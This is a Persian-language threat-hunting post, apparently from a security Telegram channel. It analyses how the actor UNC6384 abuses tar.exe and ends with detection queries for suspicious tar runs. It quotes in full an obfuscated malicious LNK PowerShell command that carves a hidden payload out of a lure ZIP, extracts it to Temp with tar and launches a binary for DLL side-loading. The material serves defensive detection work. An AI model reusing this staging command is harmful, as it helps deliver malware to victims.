امروز بررسی میکنیم که مهاجمان چگونه از ابزار tar اکسپلویت میکنند و چگونه میتوان از این موضوع برای شکار پیش دستانه (Proactive Hunting) استفاده کرد.
بیایید به UNC6384 نگاه کنیم.
مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
این اسکریپت کارهای زیر را انجام میدهد:
بهدنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip میگردد
محتوای آن را میخواند
یک بخش پنهان از دادهها که داخل این ZIP جاسازی شده را استخراج میکند (از بایت 721 به بعد)
این بخش پنهان را در یک فایل موقت ذخیره میکند (rjnlzlkfe.ta)
آن را با استفاده از tar استخراج میکند
یک فایل اجرایی را اجرا میکند
cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده میشود
حالا روی tar تمرکز کنیم:
tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp
برای مثال، میتوان موارد اجرای tar از طریق PowerShell را جستوجو کرد:
event_type: "processcreatewin"
AND
proc_p_file_path: "powershell.exe"
AND
proc_file_path: "tar.exe"
همچنین میتوان بهدنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:
event_type: "processcreatewin"
AND
proc_file_path: "tar.exe"
AND
cmdline: ("xvf" AND "temp")
به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod